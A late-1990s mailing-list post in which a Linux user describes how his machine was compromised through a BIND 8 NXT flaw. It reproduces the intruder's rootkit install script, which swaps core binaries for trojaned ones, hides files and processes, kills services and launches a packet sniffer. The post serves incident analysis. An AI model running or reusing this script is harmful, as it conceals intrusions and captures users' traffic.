>I guess I'd try something like "cat /dev/null>/var/run/utmp" trying to
>recreate the file and see if it makes any difference, although something
>tells me that wouldn't work, at least in the long run.  In any case, the
>whole thing sounds way too suspicious to me.  I would hate to cause any
>innecessary alarm, but perhaps it would be wise to consider that the
>system may have been compromised.  Did you take a look at all the log
>files to make sure everything is right?  How about the bash history?  A
>possible cracker may have installed a root kit that is causing all these
>problems.  Just a suggestion.  
>Nitebirdz

The system was compromised.  It looks like the first initial entry was
Jan 24, when the first batch of files were deposited in "/usr/ /".
But nothing seemed to have really occurred until the 24/25th.

Looking at the files that the idiot left behind, this is what the
install script did:

        ./fix /usr/bin/chfn bin/chfn
        ./fix /usr/bin/chsh bin/chsh
        ./fix /bin/login bin/login
        ./fix /bin/ls fileutils-3.13/src/ls
        ./fix /bin/du fileutils-3.13/src/du
        ./fix /usr/bin/passwd bin/passwd
        ./fix /bin/ps procps-1.01/ps
        ./fix /usr/bin/top procps-1.01/top
        ./fix /usr/sbin/in.rshd rshd/rshd
        ./fix /bin/netstat net-tools-1.32-alpha/netstat
        ./fix /sbin/ifconfig net-tools-1.32-alpha/ifconfig
        ./fix /usr/sbin/syslogd sysklogd-1.3/syslogd
        ./fix /usr/sbin/inetd inetd/inetd
        ./fix /usr/sbin/tcpd tcpd_7.4/tcpd
        ./fix /usr/bin/killall psmisc/killall
        ./fix /bin/killall psmisc/killall
        ln -sf /bin/killall psmisc/pidof
        ln -sf /usr/bin/killall psmisc/pidof
        ./fix /usr/bin/pidof psmisc/pidof
        ./fix /sbin/pidof psmisc/pidof
        ./fix /usr/bin/find findutils/find/find
        echo ".rtmp" > /dev/ptyr
        echo ".tmp" >> /dev/ptyr
        echo "..." >> /dev/ptyr
        echo " " >> /dev/ptyr
        echo "rk" >> /dev/ptyr
        echo "rks" >> /dev/ptyr
        echo ".. " >> /dev/ptyr
        echo "3 imap" > /dev/ptyp
        echo "3 eggdrop" >> /dev/ptyp
        echo "3 conf" >> /dev/ptyp
        echo "3 sniff" >> /dev/ptyp
        echo "unknown" > /dev/ptys
        echo "unk" >> /dev/ptys
        echo "unkn0wn" >> /dev/ptys
        echo "crime" >> /dev/ptys
        echo "1 195" > /dev/ptyq
        echo "1 207" >> /dev/ptyq
        echo "1 63" >> /dev/ptyq
        killall -9 rpc.mountd rpc.portmap rpc.nfsd smbd portmap 1>/dev/null 2>/dev/null
        killall -9 named nmbd snmpd ypasswd 1>/dev/null 2>/dev/null
        killall -9 rpc.yppasswdd 1>/dev/null 2>/dev/null
        mkdir /dev/.rtmp 1>/dev/null 2>/dev/null
        mv /usr/sbin/rpc.* /dev/.rtmp 1>/dev/null 2>/dev/null
        mv /usr/sbin/smbd /dev/.rtmp 1>/dev/null 2>/dev/null
        mv /usr/sbin/portmap /dev/.rtmp 1>/dev/null 2>/dev/null
        mv /usr/sbin/nmbd /dev/.rtmp 1>/dev/null 2>/dev/null
        mv /usr/sbin/named /dev/.rtmp 1>/dev/null 2>/dev/null
        mv /usr/sbin/snmpd /dev/.rtmp 1>/dev/null 2>/dev/null
        mv /usr/sbin/imapd /dev/.rtmp 1>/dev/null 2>/dev/null
        cat /etc/inetd.conf|grep -v imap > /etc/inetd.conf.good
        mv /etc/inetd.conf.good /etc/inetd.conf
        killall -HUP inetd 1>/dev/null 2>/dev/null
        rm -rf bin fileutils-3.13 findutils fix inetd
        rm -rf net-tools-1.32-alpha procps-1.01 psmisc rshd sysklogd-1.3
        rm -rf tcpd_7.4 Makefile
        if test -f ../rk.tgz; then rm -rf ../rk.tgz; fi 1>/dev/null 2>/dev/null 
3>/dev/null
        if test -f ../rk.tar; then rm -rf ../rk.tar; fi 1>/dev/null 2>/dev/null 
3>/dev/null
        if test -f ../u.tgz; then tar -zxf ../u.tgz; rm -rf ../u.tgz; fi 1>/dev/null 
2>/dev/null 3>/dev/null
        ./linsniffer > tcp.log &

The script wasn't perfect because find wasn't really "fix"ed.  It was still
able to find directories with a space and display them.  The ls wasn't
fixed either, in that it displayed the /dev/.rtmp directory.  My guess is
that it probably should not have.

The stupid thing is that if for any reason I would have had to reboot, I
would have discovered this earlier, as the login was changed so that it
wouldn't let anyone in.  It did password checking only in /etc/passwd, the
shadow system was not used and no matter what password was assigned, I
could not log in.  Pretty broken.

I'm back up temporarily, as I only did an upgrade install from 6.0 to 6.1
and there appear to be some config files that are not right, like inetd.conf.
The Elm program doesn't know where my mail is, i.e., it tries to open
/var/spool/mail.  Yep, no user name.  I'm using the Zshell.

So, it is back down shortly to do a complete install from scratch, which
sucks, but needs to be done.  I've already copied everything over to the
extra hard disk space that I have, so that I can rebuild the other programs
and stuff that I have installed.

All because bind 8's NXT was broken, the guy got in.  BTW, all the stuff
does is go out and probe other IP addresses for broken binds.  There were
three class B groups that got probed with the files that are still here.

When I'm back up again, I will be posting a complete list of what I know
to my web site.  It will be worth a look.

More later.  It is going to be a long night.

MB
-- 
e-mail: [EMAIL PROTECTED]
    Bart: Hey, why is it destroying other toys?  Lisa: They must have
    programmed it to eliminate the competition.  Bart: You mean like
    Microsoft?  Lisa: Exactly.  [The Simpsons - 12/18/99]
Visit - URL:http://www.vidiot.com/  (Your link to Star Trek and UPN)


-- 
To unsubscribe: mail [EMAIL PROTECTED] with "unsubscribe"
as the Subject.

Reply via email to